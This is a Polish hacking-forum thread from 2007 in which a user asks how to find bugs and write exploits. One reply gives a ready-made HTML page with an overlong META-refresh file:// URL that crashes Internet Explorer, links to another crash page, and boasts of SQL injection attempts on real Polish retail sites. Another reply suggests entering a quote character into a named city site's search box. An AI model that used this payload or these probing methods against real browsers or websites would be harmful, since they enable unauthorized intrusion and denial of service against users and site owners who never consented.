Pokaż wyniki 1 do 5 z 5

Temat: bugi

  1. #1
    Zarejestrowany
    Sep 2007
    Postów
    76

    Question bugi

    jak wykrywać bugi i jak pisac exploity do nich (troche głupie pytanie)

  2. #2
    Zarejestrowany
    Oct 2007
    Postów
    17

    Domyślnie

    Drogi MaxHack...

    Jak chcesz to robić to obserwuj inne błędy...

    Przydałaby się wiedza na temat: HTML, PHP, MySQL

    1. Np. na Allegro brak cudzysłowów w adresach daje możliwości, które potem możemy dalej badać...

    2. Na niektórych CMS-ach czy stronach dane wprowadzone w adres - np. http://www.jakistamadres.com/blad.ph...KEDHACKEHACKED wywoła wyświetlenie dowolnego tekstu

    3. SQLInjection - dla początkujących - metoda prób i błędów - np. mam zapisane jak na stronie Biedronki wykonałem atak SQLInjection i wyskoczyło kilka przydatnych informacji

    4. Błędy w IE Jak tkoś używa IE to jego sprawa... Ale to kwestia 5 minut i 10 linijek kody, aby wykryć dzirę typu "Stack Overflow", zawiechy IE czy wyłączenie komuś kompa... Ciekawy jest efekt - odwiedzasz strone a nagle wyłącza Ci się komp
    Może potem Ci zapodam kilka skryptów (czysty HTML) na IE

    Tutaj masz prosty skopiowany z hackme bo to na początek wystarczy:
    Kod html:
    <META HTTP-EQUIV="Refresh"       CONTENT="0;URL=file://test/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAA5ZĚ&#172;AAAAAAAAAAAAAAAAAAAAAAACCCCCSSSŞ-      #§&#172;HP+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      /">
    
          <HTML>Thx for using Internet Explorer 5.0</HTML>
    zapisz to sobie jako zawiecha.html i odpal pod IE... Efekt taki sobie...
    Potem dam coś lepszego... To nie jest jeszcze exploit, ale kombinując z tym możesz dokonać w przyszłości wiele

    Jeszcze dam Ci linka do mojej ulubionej chodź niezwykle prostej: http://1tbzs6sjz.yoyo.pl/crash-ie.html


    Pozdrawiam
    Ostatnio edytowane przez Amidamaru : 10-17-2007 - 15:26

  3. #3
    Avatar Eragon Argetlam
    Eragon Argetlam jest offline inception?no problem
    Zarejestrowany
    May 2007
    Skąd
    802.1 Wireless Wlan Card
    Postów
    552

    Domyślnie

    Było juz a forum ale przychylam sie do wypowiedzi Amidamaru A ponadto przydałby się C, VBS itp.
    A co do błędów sql to na cyber crime jest opisany błąd sqlinjection - po wpisaniu na Wrocła.Plw wyszukiwarce

    Kod:
    '
    Wskoczy ci parę linijek tekstu
    o przemyśleniach w kontekście NLP... http://www.tuetbrute.blogspot.com

  4. #4
    Zarejestrowany
    Jan 2007
    Postów
    14

    Domyślnie

    Cytat Napisał maxhack Zobacz post
    jak wykrywać bugi i jak pisac exploity do nich (troche głupie pytanie)
    jak wykrywac ... zdecydowanie fuzzing (chyba ze masz źródła).

    // Jak pisać http://milw0rm.com/papers/ u str0ke-a zawsze i na temat
    Ostatnio edytowane przez Anubis : 12-05-2007 - 20:06

  5. #5
    Zarejestrowany
    Dec 2007
    Postów
    1

    Domyślnie

    http://helion.pl/ksiazki/shell.htm
    Tutaj masz wszystko dokładnie opisane.

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj